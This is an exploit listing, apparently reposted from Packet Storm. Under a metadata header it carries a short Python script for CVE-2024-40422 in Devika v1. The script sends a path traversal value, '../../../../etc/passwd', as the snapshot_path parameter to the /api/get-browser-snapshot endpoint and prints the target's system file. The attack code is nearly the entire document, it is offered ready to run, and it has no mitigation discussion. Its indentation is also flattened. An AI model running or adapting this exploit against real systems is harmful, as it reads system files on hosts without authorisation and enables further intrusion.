# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter
# Google Dork: N/A
# Date: 2024-06-29
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/X)
# Vendor Homepage: https://devikaai.co/
# Software Link: https://github.com/stitionai/devika
# Version: v1
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-40422#!/usr/bin/python
import argparse
import requests
def exploit(target_url):
url = f'http://{target_url}/api/get-browser-snapshot'
params = {
'snapshot_path': '../../../../etc/passwd'
}
response = requests.get(url, params=params)
print(response.text)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')
parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)
args = parser.parse_args()
exploit(args.target)
文章来源: https://packetstormsecurity.com/files/179904/devika1-traversal.txt
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh